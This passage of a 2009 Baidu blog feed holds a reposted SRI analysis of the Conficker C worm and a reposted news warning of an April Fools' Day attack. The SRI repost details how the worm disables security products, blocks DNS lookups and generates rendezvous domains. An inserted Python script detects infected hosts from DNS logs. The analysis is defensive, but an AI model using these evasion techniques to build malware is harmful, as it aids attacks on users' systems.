<br>
14. A good girl likes gentle music, doesn't go to bars and doesn't stay up late. She arranges her life to be quiet and sweet, and treats every love as the love of a lifetime. Every commitment is complete, and every departure is clean. Such girls are both gentle and brave.<br>
<br>
15. A good girl always has a few close girlfriends. She doesn't just cling to her boyfriend; she knows how to share her happiness and joy, as well as her growing pains, with friends.<br>
<br>
16. A good girl reads many books in her spare time. In books she broadens her horizons, grows her knowledge and lifts her mind. In books she seeks a quiet kind of growth.</font><br>
</font></p>
<p> </p>
<p> </p>
<p> </p>
<p><font size="4">----</font></p>
<p><font size="4">Reposted from &ldquo;http://hi.baidu.com/kingpheonix/blog/item/a674077b15d036fc0bd187a6.html&rdquo;</font></p> <a href="http://hi.baidu.com/harite/blog/item/2fb8fa1fbed57afde1fe0b3f.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/2fb8fa1fbed57afde1fe0b3f.html#comment">View comments</a>]]></description>
        <pubDate>2009年04月05日 星期日  下午 08:26</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/2fb8fa1fbed57afde1fe0b3f.html</guid>
</item>

<item>
        <title><![CDATA[Conficker C Analysis (reposted)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/0768bb358679bd83a61e1286.html]]></link>
        <description><![CDATA[
		
		<p>Following on from the previous post, let's see what the thing predicted to run wild on April Fools' Day actually is.</p>
<p>Reposted from &ldquo;http://mtc.sri.com/Conficker/addendumC/&rdquo;; some sections were omitted because of the length limit on Baidu posts.</p>
<p> </p>
<p>
<table style="text-align: left; width: 100%" class="FCK__ShowTableBorders" border="0" cellspacing="2" cellpadding="2">
    <tbody>
        <tr>
            <td style="vertical-align: top"><big>SRI International<br>
            <small>Technical Report</small></big></td>
            <td style="vertical-align: top"> </td>
        </tr>
        <tr>
            <td style="vertical-align: top"><big><span><br>
            Addendum<br>
            <br>
            Conficker C  Analysis</span></big><br>
            Phillip Porras, Hassen Saidi, and Vinod Yegneswaran<br>
            <span style=" font-weight: normal">http://mtc.sri.com/Conficker</span><br>
            <br>
            Release Date: 08 March 2009<br>
            Last Update:&nbsp;&nbsp;  <span style="color: rgb(255,0,0)">19 March 2009</span><br>
             </td>
            <td style="vertical-align: top"> </td>
        </tr>
        <tr>
            <td style="vertical-align: top; font-weight: normal"><span>Computer Science Laboratory</span> <br>
            <span>SRI International</span><br>
            <span>333 Ravenswood Avenue<br>
            Menlo Park CA 94025 USA</span></td>
            <td style="text-align: right; vertical-align: top"> </td>
        </tr>
    </tbody>
</table>
<br>
<br>
<br>
<table style="text-align: left; width: 100%" border="1" cellspacing="2" cellpadding="2">
    <tbody>
        <tr>
            <td style="vertical-align: top">
            <div style="text-align: center"><span style="color: rgb(153,0,0); font-weight: bold"><br>
            -- NOTICES -- <br>
            <br style="color: rgb(153,0,0); font-weight: bold">
            </span></div>
            <div style="text-align: center; color: rgb(153,0,0); font-weight: bold">This draft document represents an analysis in progress and is subject to</div>
            <div style="text-align: center"><span style="color: rgb(153,0,0); font-weight: bold">continual enhancement, error correction, and  improvement<big><br>
            <br>
            </big><br>
            </span></div>
            </td>
        </tr>
    </tbody>
</table>
</p>
<h2>Introduction</h2>
<p style="text-align: justify">This addendum provides an evolving snapshot of our understanding of the latest Conficker variant, referred to as<span style="font-style: italic"> Conficker C</span>.&nbsp;&nbsp;  The variant was brought to the attention of the Conficker Working Group when one member reported that a compromised Conficker B honeypot was updated with a new dynamically linked library (DLL). Although a network trace for this infection is not available, we suspect that this DLL may have propagated via Conficker's Internet rendezvous point mechanism (<a href="http://mtc.sri.com/Conficker/addendumC/#sec-global-impact">Global Network Impact</a>).&nbsp;&nbsp;  The infection was found on the morning of Friday, 6 March 2009 (PST), and it was later reported that other working group members had received other DLL reinfections throughout the same day.&nbsp;&nbsp;  Since that point, multiple members have reported upgrades of previously infected machines to this latest variant via HTTP-based Internet rendezvous points.  We believe this latest outbreak of Conficker variant C began first spreading at roughly 6 p.m. PST, 4 March 2009 (5 March UTC).&nbsp;&nbsp;&nbsp;</p>
<p style="text-align: justify"><span style="font-style: italic"><br>
</span>In this addendum report, we summarize the inner workings and practical implications of this latest malicious software application produced by the Conficker developers.&nbsp;&nbsp;  In addition to the dual layers of packing and encryption used to protect A and B from reverse engineering, this latest variant also cloaks its newest code segments, along with its latest functionality, under a significant layer of code obfuscation to further hinder binary analysis.&nbsp;&nbsp;  Nevertheless, with a careful mixture of static and dynamic analysis, we attempt here to summarize the internal logic of Conficker C.</p>
<div style="text-align: justify">
<h2>Implications of Variant C</h2>
Variant C represents the third major revision of the Conficker malware family, which first appeared on the Internet on 20 November 2008.&nbsp;&nbsp;  C distinguishes itself as a significant revision to Conficker B.  In fact, we estimate that C  leaves as little as 15% of the original B code base untouched, as illustrated in Appendix 3,  <a href="http://mtc.sri.com/Conficker/addendumC/#Appendix_3_Compartive_Assessment_from_">A Comparative Assessment of Conficker B and C Process Images</a>. &nbsp;&nbsp;  Whereas the recently reported B++ variant represented a more surgical derivative of B,  C incorporates a major restructuring of B's previous thread architecture and program logic, including major functional additions such as a new peer-to-peer (P2P) coordination channel,  and a revision of the domain generation algorithm (DGA).   It is clear that the Conficker authors are well informed and are tracking efforts to eliminate the previous Conficker epidemics at the host and Internet governance level.  In Conficker C, they have now responded with many of their own countermeasures to thwart these latest defenses.<br>
<br>
For example, C's latest revision of Conficker's now well-known Internet rendezvous logic may represent a direct retort to the action of the Conficker Cabal, which recently blocked all domain registrations associated with the A and B strains.&nbsp;&nbsp;  C now selects its rendezvous points from a pool of over 50,000 randomly generated domain name candidates each day.&nbsp;&nbsp;  C further increases Conficker's top-level domain (TLD) spread from five TLDs in Conficker A, to eight TLDs in B, to 110 TLDs that must now be involved in coordination efforts to track and block C's potential DNS queries.&nbsp;&nbsp;&nbsp;  With this latest escalation in domain space manipulation, C not only represents a significant challenge to those hoping to track its census, but highlights some weaknesses in the long-term viability of how  Internet address and name space governance is conducted.<br>
  <br>
One interesting and minimally explored aspect of Conficker is its early and sophisticated adoption of binary encryption, digital signatures, and advanced hash algorithms to prevent third-party hijacking of the infected population.&nbsp;&nbsp;  At its core, the main purpose of Conficker is to provide the authors with a secure binary updating service that effectively allows them instant control of millions of PCs worldwide.&nbsp;&nbsp;  Through the use of these binary encryption methods, Conficker's authors have taken care to ensure that other groups cannot upload arbitrary binaries to their infected drone population, and these protections cover all Conficker updating services: Internet rendezvous point downloads, buffer overflow re-exploitation, and the latest P2P control protocol.<br>
<br>
In evaluating this mechanism, we find that the Conficker authors have devised a sophisticated encryption protocol that is generally robust to direct attack.  All three crypto-systems employed by Conficker's authors (RC4, RSA, and MD-6) also have one underlying commonality.  They were all produced by Dr. Ron Rivest of MIT.  Furthermore, MD-6 is a particularly unusual algorithm selection, as it is the most recently published cryptographic hash algorithm to date.  The discovery of MD-6 in Conficker B is indeed highly unusual given Conficker's own development time line.  We date the creation of Conficker A to have occurred in October 2008, roughly the same time frame in which MD-6 had been publicly released by Dr. Rivest (see http://groups.csail.mit.edu/cis/md6).   While A employed SHA-1, we can now confirm that MD-6 had been integrated into Conficker B by late December 2008 (i.e., the authors chose to incorporate a hash algorithm that had literally been made publicly available only a few weeks earlier).<br>
<br>
Unfortunately for the Conficker authors, by mid-January, Dr. Rivest&rsquo;s group submitted a revised version of the MD-6 algorithm, as a buffer overflow had been discovered in its implementation.&nbsp;&nbsp;  This revision was inserted quietly, followed later by a more visible public announcement of the buffer overflow on 19 February 2009, with the release of the Fortify report (http://blog.fortify.com/repo/Fortify-SHA-3-Report.pdf). We confirmed that this buffer overflow was present in the Conficker B implementations.  However, we also confirmed that this buffer overflow was not exploitable as a means to take control of Conficker hosts.&nbsp;&nbsp;&nbsp;  Nevertheless, the Conficker developers were obviously aware of these developments, as they have now repaired their MD-6 implementation in Conficker C, using the identical fix made by Dr. Rivest's group.  Clearly the authors are aware of, and adept at understanding and incorporating, the latest cryptographic advances, and are actively monitoring the latest developments in this community.<br>
<br>
One major implication from the Conficker B and C variants, as well as other now recently emerging malware families, is the sophistication with which they are able to terminate, disable, reconfigure, or blackhole native operating system (OS) and third-party security services.   We provide an in-depth analysis of Conficker's <a href="http://mtc.sri.com/Conficker/addendumC/#SecurityProductDisablement">Security Product Disablement</a> logic, to help illustrate the comprehensive challenge that modern malware poses to security products, and to Microsoft's anti-malware efforts.&nbsp;&nbsp;  Conficker offers a nice illustration of the degree to which security vendors are being actively challenged to not  just hunt for malicious logic, but to defend their own availability, integrity, and the network connectivity vital to providing them a continual flow of the latest malware threat intelligence.<br>
<br>
Perhaps the most obviously frightening aspect of Conficker C is its clear potential to do harm.  Among the long history of malware epidemics, very few can claim sustained worldwide infiltration of multiple millions of infected drones.  Perhaps in the best case, Conficker may be used as a sustained and profitable platform for massive Internet fraud and theft.  In the worst case, Conficker could be turned into a powerful offensive weapon for performing concerted information warfare attacks that could disrupt not just countries, but the Internet itself. <br>
 <br>
Finally, we must also acknowledge the multiple skill sets that are revealed within the evolving design and implementation of Conficker.  Those responsible for this outbreak have demonstrated Internet-wide programming skills, advanced cryptographic skills, custom dual-layer code packing and code obfuscation skills, and in-depth knowledge of Windows internals and security products.  They are among the first to introduce the Internet rendezvous point scheme, and have now integrated a sophisticated P2P protocol that does not require an embedded peer list.  They have continually seeded the Internet with new MD5 variants, and have adapted their code base to address the latest attempts to thwart Conficker.&nbsp;&nbsp;  They have infiltrated government sites, military networks, home PCs, critical infrastructure, small networks, and universities, around the world.  Perhaps an even greater threat than what they have done so far, is what they have learned and what they will build next.</div>
<h2>Conficker C Overview</h2>
<div style="text-align: justify"><a href="http://mtc.sri.com/Conficker/addendumC/index2.html#fig-D-Overview">Figure 1</a> illustrates the Conficker C program structure and logic.  When initialized, the DLL performs its setup logic, similar to that of A and B, with extensions.  At initialization, it checks for the presence of three mutex values on the target host to avoid reinfection.  If absent, these three mutexes are created: 1) the mutex name &quot;Global\&lt;string&gt;-7&quot;; 2) the mutex name &quot;Global\&lt;string&gt;-99&quot;; and 3) a mutex whose name is pseudo-randomly generated from the process ID.  The &lt;string&gt; in the first two mutexes is unique per computer name; it is calculated from the crc32 hash of the computer name XOR'ed with a constant.  C then installs several in-memory patches to DLLs, and embeds other mechanisms to thwart security applications that would otherwise detect its presence.<br>
<br>
C modifies the host domain name service (DNS) APIs to block various security-related network connections (<a href="http://mtc.sri.com/Conficker/addendumC/#dns-prevention">Domain Lookup Prevention</a>), and installs a pseudo-patch to repair the 445/TCP vulnerability, while maintaining a backdoor for reinfection (<a href="http://mtc.sri.com/Conficker/addendumC/#sec-pseudo-path">Local Host Patch Logic</a>). This pseudo patch protects the host from buffer overflows by sources other than those performed by the Conficker authors or their infected peers. &nbsp;&nbsp;&nbsp;  <br>
<br>
Like Conficker B, C incorporates logic to defend itself from security products that would otherwise attempt to detect and remove it.  C spawns a security <a href="http://mtc.sri.com/Conficker/addendumC/#service-disablement">product disablement thread</a>.  This thread disables critical host security services, such as Windows Defender, as well as Windows services that deliver security patches and software updates.  These changes effectively prevent the victim host from receiving automated software updates. The thread disables security update notifications and deactivates safeboot mode as a future reboot option.  This first thread then spawns a new <a href="http://mtc.sri.com/Conficker/addendumC/#process-termination">security process termination thread</a>, which continually monitors for and kills processes whose names match a blacklisted set of 23 security products, hot fixes, and security diagnosis tools. </div>
<hr style="width: 100%; height: 1px" noshade="noshade">
<p><a name="fig-D-Overview"></a></p>
<p style="text-align: center"><img style="width: 518px; height: 752px" src="http://mtc.sri.com/Conficker/addendumC/functional-thread-overview.jpg"></p>
<p style="text-align: center"><span style="font-weight: bold"> Figure 1:  Overview of Conficker C</span></p>
<hr style="width: 100%; height: 1px" noshade="noshade">
<p style="text-align: justify"><br>
Conficker C installs itself into the user file system and configures the registry appropriately to invoke its DLL at host startup.  It also inserts a variety of extraneous registry keys that are subsequently unused, presumably to cloak its presence (<a href="http://mtc.sri.com/Conficker/addendumC/#install-obfuscate">Obfuscating C's Installation and Its Presence</a>).  It copies itself into a randomly named DLL located in either the System32 directory, the Program Files directory, or the user's temporary files folder.  It deletes all restore points prior to its infection to thwart rollback.  C then performs a simple validation of its DLL size, and terminates itself if this check fails.  It sets the DLL's date to the same date as the local <span>kernel32.dll,</span> and sets NT File System (NTFS) file permissions on its stored file image to prevent write and delete privileges.  Once installed, the DLL spawns a remote thread, which it attaches to the <span>netsvcs.exe</span> or <span>svchost.exe</span> process, depending on the OS version.</p>
<p style="text-align: justify">The core elements of Conficker C are incorporated into two threads: a P2P communication thread, and the domain generation and Internet rendezvous point thread.  The first thread is embodied in a code segment that has undergone an additional layer of code obfuscation, suggesting a desire by the Conficker authors to hinder its analysis, and thereby providing an obvious point for in-depth inspection.  We describe the P2P protocol in <a href="http://mtc.sri.com/Conficker/addendumC/index2.html#peer-to-peer">Peer to Peer Logic</a>.  The P2P protocol includes an ability to coordinate with peers over TCP and UDP channels, as well as download and run digitally signed Win32 binaries.  Incorporated with the P2P thread is anti-tracing logic that will kill the Conficker C process when run under a debugger.  This logic was removed for this analysis.  Conficker C also incorporates an HTTP date check function, which is discussed within <a href="http://mtc.sri.com/Conficker/addendumC/#peer-to-peer">Peer to Peer Logic</a>.</p>
<div style="text-align: justify">Finally, C introduces a substantial modification of the DGA and query procedure, discussed in <a href="http://mtc.sri.com/Conficker/addendumC/index2.html#domain-generation-algorithm">Domain Generation Algorithm</a>.&nbsp;&nbsp;&nbsp;  The DGA will be activated on 1 April 2009, and before April 1st it will enter a loop that sleeps 24 hours and then rechecks the date via <span>getlocaltime</span>.&nbsp;&nbsp;  Prior to entering the April 1st date check, C will sleep for an initial random interval between 30 and 90 minutes.  More specifically, this sleep interval is between 30 and 90 minutes if the local hour is after 11 a.m. and before 7 a.m. If the  local time is after 8 a.m. and before 11 a.m., the sleep period will be between 2.5  and 3.5 hours.  It will then check for Internet connectivity, and if connected will enter the domain generation logic.&nbsp;&nbsp;  The next section describes this logic in greater detail.</div>
<p style="text-align: justify">(omitted)</p>
<h2>In-Situ Analysis - Sandbox Operations</h2>
<p style="text-align: justify">We used dynamic sandbox monitoring techniques to evaluate the interactions of Conficker C when operating live on the Internet.  The release used for this analysis was monitored and filtered such that it would not cause  harm to other external hosts while these experiments were being conducted.</p>
<p style="text-align: justify">We describe the network profile of a Conficker C infected host during a 30-minute sandbox execution.  Since our current experiments were conducted in early March 2009, we did not see the HTTP rendezvous point lookups.  We expect this activity profile to change on 1 April.&nbsp;&nbsp;  During our pre 1 April sandbox run, we observed the following network effects, which are illustrated in <a href="http://mtc.sri.com/Conficker/addendumC/index.html#fig-net-traffic-profile">Figure 9</a>.</p>
<div style="text-align: justify">DNS queries at a rate of 10 to 25 per 5-minute interval were observed.  We also observed web server queries, which included connections to <span>4shared.com, adobe.com, allegro.pl, ameblo.jp, answers.com, aweber.com, badongo.com, baidu.com, bbc.co.uk, blogfa.com, clicksor.com, comcast.net, cricinfo.com, disney.go.com, ebay.co.uk, facebook.com, fastclick.com, friendster.com, imdb.com, megaporn.com, megaupload.com, miniclip.com, mininova.org, ning.com, photobucket.com, rapidshare.com, reference.com, seznam.cz, soso.com, studiverzeichnis.com, tianya.cn, torrentz.com, tribalfusion.com, tube8.com, tuenti.com, typepad.com, ucoz.ru, veoh.com, vkontakte.ru, wikimedia.org, wordpress.com, xnxx.com, yahoo.com, and youtube.com</span>.</div>
<div style="text-align: justify">P2P queries were sent to random hosts on high-order ports.  This is steady at a rate of 50 to 60 hosts per 5 minutes in TCP and a rate of 240 to 2500 hosts per 5 minutes in UDP.  The failed TCP and UDP attempts also result in a high rate of inbound ICMP backscatter.</div>
<div style="text-align: justify">There are also six HTTP connections that were all successfully established in the first 5 minutes to <span>tuenti.com, tianya.cn, miniclip.com, blogfa.com, answers.com and rapidshare.com</span>.  In each case, the GET request was to the top directory (GET / HTTP/1.1). Responses are gzip-encoded HTML content.</div>
<div style="margin-left: 40px"><span>GET / HTTP/1.1</span><br>
<span>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/x-ms-xbap, */*</span><br>
<span>Accept-Language: en-GB</span><br>
<span>Accept-Encoding: gzip, deflate</span><br>
<span>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)</span><br>
<span>Host: rapidshare.com</span><br>
<span>Connection: Keep-Alive</span></div>
<hr style="width: 100%; height: 1px" noshade="noshade">
<p><a name="fig-net-traffic-profile"></a><br>
 </p>
<p><strong><img style="width: 612px; height: 468px" src="http://mtc.sri.com/Conficker/addendumC/in-situ-c.png"><br>
</strong></p>
<div style="text-align: center"><strong>Figure 9:  Pre 1 April 2009 short-term network traffic profile<br>
<br>
<a name="fig-6hr-insitu"></a><br>
<img style="width: 612px; height: 468px" src="http://mtc.sri.com/Conficker/addendumC/insitu-sixhour.png"><br>
</strong><strong>Figure 10:  </strong><span style="font-weight: bold">Post 1 April 2009 6-hour network traffic profile</span><br>
<strong><br>
<br>
</strong></div>
<hr style="width: 100%; height: 1px" noshade="noshade">
<div style="text-align: justify">We also created a new (mutated) version of the binary that executes the post-1 April 2009 logic.  The graph in <a href="http://mtc.sri.com/Conficker/addendumC/index.html#fig-6hr-insitu">Figure 10</a> summarizes a long-running (6-hour) network trace of this binary.  This figure captures the volumes of observed outbound communication attempts over the multihour run: HTTP, DNS, TCP P2P, and UDP P2P activity.  The DNS activity includes two components: attempts to contact the 500 rendezvous points, and attempts to contact Internet portals for finding the date.  The trace from this live experimental run corroborates our static analysis results: each C host contacts 500 rendezvous points each day over 116 TLDs with a flat entropy (random domain name space).  We see a dropoff in overall levels of DNS activity after hour 3, once it has looked up the IP addresses of all 500 domains.  In our case, all of these were failed (NXDOMAIN) attempts, as these domains have not yet been registered.<br>
<br>
The UDP and TCP P2P activity also drops off in the first 2 hours before settling on a steady scanning rate. The HTTP date check activity remains relatively steady at six to nine hosts contacted per hour. The key implication from the in-situ analysis is that it should be fairly easy to fingerprint Conficker C based upon its unique TCP and UDP scanning patterns.  We should also be able to identify C hosts (starting 1 April 2009) based on the volume of NXDOMAIN responses these hosts would receive for failed DNS lookups.</div>
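<p style="text-align: justify">The NXDOMAIN-volume indicator described above can be turned into a log-side check. The following is an added example, not part of the SRI report or its tooling: it profiles each client in a resolver log by NXDOMAIN count, distinct TLDs, first-label entropy and peak rate within a sliding window, and flags clients that match the rendezvous-lookup pattern. The log format, the thresholds and every sample line are constructed.</p>

```python
"""Flag hosts whose failed-lookup profile matches the Conficker C behaviour
described above: on the order of 500 NXDOMAIN answers per day for random-looking
names spread across many TLDs, concentrated in the first hours after activation.

Added example, not part of the SRI report or its tooling. The resolver log
format, the thresholds and every sample line are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import math
import random
import re

# Constructed (hypothetical) resolver log line: "<ISO timestamp> <client> <qname> <rcode>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def shannon_entropy(label: str) -> float:
    """Bits per character of a DNS label; random labels score higher than words."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse(lines):
    """Yield (timestamp, client, qname, rcode); malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, qname, rcode = m.groups()
        yield datetime.fromisoformat(ts), client, qname.rstrip(".").lower(), rcode


def profile_hosts(lines, window=timedelta(hours=1)):
    """Per client: NXDOMAIN total, distinct TLDs, mean first-label entropy and
    the peak number of NXDOMAINs inside any sliding window of length `window`."""
    per = defaultdict(lambda: {"nx": 0, "tlds": set(), "ent": [], "times": []})
    for ts, client, qname, rcode in parse(lines):
        if rcode != "NXDOMAIN":
            continue
        labels = qname.split(".")
        p = per[client]
        p["nx"] += 1
        p["tlds"].add(labels[-1])
        p["ent"].append(shannon_entropy(labels[0]))
        p["times"].append(ts)
    profile = {}
    for client, p in per.items():
        times = sorted(p["times"])
        peak = j = 0
        for i, t in enumerate(times):
            while times[j] < t - window:  # advance the window's left edge
                j += 1
            peak = max(peak, i - j + 1)
        profile[client] = {
            "nxdomain": p["nx"],
            "tlds": len(p["tlds"]),
            "mean_entropy": sum(p["ent"]) / len(p["ent"]),
            "peak_per_window": peak,
        }
    return profile


def suspects(lines, min_nx=200, min_tlds=15, min_entropy=2.0):
    """Clients exceeding all three thresholds. The thresholds are constructed,
    set well below the 500-domain / 116-TLD figures quoted above so that a
    partial day of logs still triggers."""
    return sorted(c for c, s in profile_hosts(lines).items()
                  if s["nxdomain"] >= min_nx and s["tlds"] >= min_tlds
                  and s["mean_entropy"] >= min_entropy)


def constructed_log(seed=1):
    """Synthetic log: 10.0.0.7 mimics a C host (500 random names over ~3 hours),
    10.0.0.9 is an ordinary client with a single typo-induced NXDOMAIN."""
    rng = random.Random(seed)
    tlds = ["com", "net", "org", "info", "biz", "cc", "tv", "ws", "ru", "cn", "de",
            "fr", "jp", "kr", "uk", "it", "nl", "pl", "br", "mx", "ar", "be", "ch"]
    t0 = datetime(2009, 4, 1, 0, 0, 0)
    lines = []
    for i in range(500):
        label = "".join(rng.choice("abcdefghijklmnopqrstuvwxyz")
                        for _ in range(rng.randint(6, 12)))
        ts = t0 + timedelta(seconds=20 * i)
        lines.append(f"{ts.isoformat()} 10.0.0.7 {label}.{rng.choice(tlds)} NXDOMAIN")
    for i, (host, rcode) in enumerate([("www.example.com", "NOERROR"),
                                       ("mail.example.org", "NOERROR"),
                                       ("typo.exmaple.com", "NXDOMAIN")]):
        lines.append(f"{(t0 + timedelta(minutes=7 * i)).isoformat()} 10.0.0.9 {host} {rcode}")
    return lines


SAMPLE_LOG = constructed_log()
```

Running `suspects(SAMPLE_LOG)` returns only the mimicking host; the ordinary client, with one NXDOMAIN and one TLD, stays below every threshold.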
<h2>Conclusion</h2>
<p style="text-align: justify">We present an analysis of Conficker Variant C, which emerged on the Internet at roughly 6 p.m. (PST) on 4 March 2009.  This variant incorporates significant new functionality, including a new domain generation algorithm and a new peer-to-peer file sharing service.  Absent from our discussion has been any reference to the well-known attack propagation vectors (RPC buffer overflow, USB, and NetBIOS scans) that have allowed C's predecessors to saturate so much of the Internet.  Although not present in C, these attack propagation services are but one peer upload away from any C-infected host, and may appear at any time.  C is, in fact, a robust and secure distribution utility for distributing malicious content and binaries to millions of computers across the Internet.  This utility incorporates a potent arsenal of methods to defend itself from security products, updates, and diagnosis tools.  It further demonstrates the rapid development pace at which Conficker's authors are maintaining their current foothold on a large number of Internet-connected hosts.  Further, if organized into a coordinated offensive weapon, this multimillion-node botnet poses a serious and dire threat to the Internet.  </p>
<p style="text-align: justify">Our report represents one of many Conficker analysis studies going on throughout the whitehat community, and we are in direct contact with numerous groups that will produce additional details, and will help clarify errors that exist in this report.  This report is a living document, and we will update it regularly, as our understanding of variant C continues to grow. </p>
<h2>Acknowledgments</h2>
<p style="text-align: justify">We would like to thank Drew Dean from SRI's Computer Science Laboratory for his assistance in understanding the binary validation routine.  We would like to thank Bruce Dang from Microsoft for his assistance in understanding the mutex key generation.  We would like to thank Arvind Narayanan from the University of Texas at Austin for his collaboration in developing the Horizontal Malware Analysis tool shown in Appendix 2.</p>
<h2>Appendices</h2>
<h3>Appendix 1  Embedded Strings Within Conficker C</h3>
<p>We have extracted and categorized the set of strings that are embedded in the Conficker C binary.  The full set of embedded Conficker C strings is listed <a href="http://mtc.sri.com/Conficker/addendumC/appendix1.html">HERE</a>. </p>
<h3><a name="Appendix_2_Domain_Generator_Filtered"></a>Appendix 2&nbsp;&nbsp;  Domain Generator Filtered Address Ranges</h3>
<p>We have isolated the full set of IP address ranges that are used to prefilter all IP addresses produced by the Conficker C domain generation algorithm. This blocklist is shown <a href="http://mtc.sri.com/Conficker/addendumC/appendix2.html">HERE</a>.</p>
<h3><a name="Appendix_3_Compartive_Assessment_from_"></a>Appendix 3&nbsp;&nbsp;  A Comparative Assessment of Conficker B and C Process Images</h3>
<p>This is a comparative assessment of the Conficker B++ vs. Conficker C disassembled process images.  The complete comparative assessment of B++ vs C  is available <a href="http://mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/">HERE</a>.</p>
<h3><a name="appendix4"></a>Appendix 4&nbsp;&nbsp;  Sandbox Results from Running Conficker C</h3>
<p>This appendix shows a forensic analysis of the Conficker C binary as captured through dynamic network analysis and sandbox testing.  See the full list of  forensic results <a href="http://mtc.sri.com/Conficker/addendumC/appendix4.html">HERE</a>.</p>
<h3><a name="appendix5-api-recovery-table"></a>Appendix 5&nbsp;&nbsp;  API Recovery Table</h3>
<p>This appendix maps the set of obfuscated APIs to their code offsets.  The map is useful for a reverse engineering analyst to understand the P2P protocol logic.  See the API list <a href="http://mtc.sri.com/Conficker/addendumC/appendix5.html">HERE</a>.</p>
]]></description>
        <pubDate>2009年03月26日 星期四  下午 07:00</pubDate>
        <category><![CDATA[安全技术]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/0768bb358679bd83a61e1286.html</guid>
</item>

<item>
        <title><![CDATA[Hackers May Launch the Largest Cyber Attack in History on April Fools' Day (repost)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/1add8dd63ab9a02706088b41.html]]></link>
        <description><![CDATA[
		
		<p>Reposted from &ldquo;http://www.cert.org.cn/articles/news/common/2009032624260.shtml&rdquo;</p>
<p> </p>
<p>
<table class="FCK__ShowTableBorders" border="0" cellspacing="0" cellpadding="0" width="100%">
    <tbody>
        <tr>
            <td class="3jtitle" colspan="2" align="center">Hackers May Launch the Largest Cyber Attack in History on April Fools' Day</td>
        </tr>
        <tr style="border-bottom: #b22222 1px solid; border-left: #b22222 1px solid; overflow-y: visible; height: 400px; border-top: #b22222 1px solid; border-right: #b22222 1px solid">
            <td class="3neirong" valign="top" colspan="2" align="left">
            <p> </p>
            <p>&nbsp;&nbsp;&nbsp;  After quietly infecting more than 15 million computers worldwide, the Conficker worm, jokingly dubbed a &ldquo;model worm&rdquo; by Microsoft researchers, is about to show its true face. On March 25, 360 Security Center, China's largest network security vendor, issued a warning that the author of the Conficker worm will very likely launch an unprecedented global cyber attack starting on April 1, at which point more than a hundred large websites worldwide, including Baidu, Kaixin001, Disney and IBM, could face a serious risk of server paralysis and users being unable to reach them. At almost the same time, two well-known international security firms, CA Jinchen and Trend Micro, also issued urgent April Fools' Day warnings about the virus. <br>
            <br>
            &nbsp;&nbsp;&nbsp;  The mysterious Conficker sets an &ldquo;April Fools' trap&rdquo;; it once grounded French warplanes <br>
            <br>
            &nbsp;&nbsp;&nbsp;  Dr. Shi Xiaohong, a 360 security expert, said that according to analysis of the samples of the Conficker worm and its variants captured by 360 Security Center, the virus author is very likely, starting April 1, to take control of the tens of millions of &ldquo;zombie&rdquo; computers it has infected and automatically send network data to over a hundred large websites worldwide. The form of attack is most likely a mainstream DDoS attack against web servers, and the targets are mainly top-ranked large Internet and corporate sites worldwide; four extremely popular domestic sites, Baidu, Tencent Soso, Kaixin001 and Xiaonei, are also on the list. <br>
            <br>
            &nbsp;&nbsp;&nbsp;  &ldquo;The Conficker.C worm is currently in a dormant loop on the computers it has infected. Once the system time passes April 1, 2009, it will wake up and, after a series of floating-point calculations, send packets to over a hundred pre-designated websites. Judging by Conficker.C's infection count of tens of millions of computers worldwide, the botnet they form is no less powerful than a nuclear weapon in the Internet world; any website's servers would quickly collapse under such high-intensity attack pressure, and the targets are very likely high-ranking sites the Conficker author selected from the Alexa traffic rankings,&rdquo; said engineers at 360 Security Center. <br>
            <br>
            &nbsp;&nbsp;&nbsp;  It is understood that the Conficker worm first appeared on the Internet last November. It uses the MS08-067 vulnerability in the Windows operating system to implant itself on unpatched computers, and spreads via LANs, USB drives and other means. A French soldier caught Conficker by using a USB drive at home, after which the French Navy's internal network was heavily infected; the military treated it as a major threat, cutting off all web and e-mail systems, and some warplanes' take-off schedules were abruptly halted. Subsequently, military systems in the UK and Germany also reported large-scale Conficker infections, which shows its propagation ability and impact. <br>
            <br>
            &nbsp;&nbsp;&nbsp;  Strangely, while frantically infecting computers worldwide, the Conficker worm's behaviour has been unusually &ldquo;well-behaved&rdquo;. On the surface, &ldquo;it seeks neither fame (no 60-second countdown, no clogging the network, no pop-ups, no bypassing system restore, no letting everyone know) nor profit (it just hides and does not steal online banking or gaming credentials; even cases of a failed attack crashing a user's system or causing login failures are rare),&rdquo; wrote a senior security researcher at Microsoft China, known online as &ldquo;Daniuwa&rdquo;, on his personal blog; &ldquo;it can be called the &lsquo;model&rsquo; of worms worldwide.&rdquo; <br>
            <br>
            &nbsp;&nbsp;&nbsp;  After lying low for more than four months, is the Conficker author's ultimate goal merely to launch a large-scale cyber attack on April Fools' Day? On this, engineers at 360 Security Center said: &ldquo;There is much speculation in the industry about Conficker. With the power implied by its huge infection count, making a fortune would be trivially easy, and it could even paralyse the global civilian Internet. In 2002 hackers used a million-scale worm to attack the DNS root servers in the United States, taking down sites such as Google, Microsoft and IBM. Yet the Conficker worm, which already controls tens of millions of computers, is so far only spreading itself; the mastermind behind it has not acted, leaving everyone guessing what the hacker is up to. At present we can only reverse-engineer the samples we have obtained; the Conficker.C variant's intent to launch an attack from April 1 is very clear, but we cannot rule out that this is a giant April Fools' joke its author is playing on the world's security researchers.&rdquo; <br>
            <br>
